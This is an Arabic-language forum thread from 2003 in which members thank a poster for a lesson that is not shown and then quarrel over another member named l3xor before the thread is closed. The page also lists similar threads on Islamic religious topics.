
El_TeNNiiN · 19-11-2003, 11:01

العفو كلكم جميعا و انشاء الله يكون الدرس عجبكم
المهم
ليكسور هذا يثير القلاقل ارجو اخذ الحذر منه
EL_TENNIIN
EGYPTIAN donkey
CU BYE

Fares_Elzeell · 20-11-2003, 01:59

مساء الفل ياتنين

اية ياتنين الحلاوة دى ياولد

من يومك مبدع وانشاء الله المنتدى هيولع من هنا وجاى

وبعدين مقلتش يعنى انك مشترك هنا

بقولك ياريت تبعد عن الأخ l3xor

عشان انا عملت معاه تاتش قبل كده وهو فعلا مفكر نفسة الزعيم هنا بس اتمنى انه يحسن اسلوبة شوية فى التعامل

وكل سنه وانتم طيبين

Linux-Rulez · 20-11-2003, 02:57

ههههههههههههخ

انت تاني يا L3x0r

bad boy
|3|

ThE_X · 20-11-2003, 03:25

الحمد له ثبت عليكم الكذب علي والنفاق وتحريف الكلام انتم الثلاثه والخناني

وثبت هذا للجميع ورجاءا ما اريد اي شخص منكم انتم الثلاث ان تذكروا اسمي بعد الان

تحياتي ,,,,
:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::

شباب بكفي لو سمحتوووووووووووووووووووووووووووووووووووووو مو ناقصين مشاكل

Linux donkey

Closed

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
انواع عرض الموضوع
العرض العادي الانتقال إلى العرض المتطور الانتقال إلى العرض الشجري

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
100 صفة تميز بها نبينا محمد صلى الله عليه وسلم	السيف عزام	رسول الله صلى الله عليه وسلم	1	08-05-2011 04:22
فضل الصلاة على النبي محمد رسول الله صلى الله عليه و سلم	adens	رسول الله صلى الله عليه وسلم	0	07-04-2010 12:26
وصف كامل لحبيبنا ورسولنا محمد صلى الله عليه وسلم ...	The and	رسول الله صلى الله عليه وسلم	3	14-11-2009 10:24
هل تعلم ماذا يحب الله تعالى وهل تريد أن يحبك الله	alraia	القسم الشرعي	6	12-11-2009 01:22
ماهي الأعمال التي نعملها وبإذن الله بسببها يرحمنا الله ويدخلنا الجنة , موضوع مهم جدا	alraia	القسم الشرعي	0	04-07-2009 06:31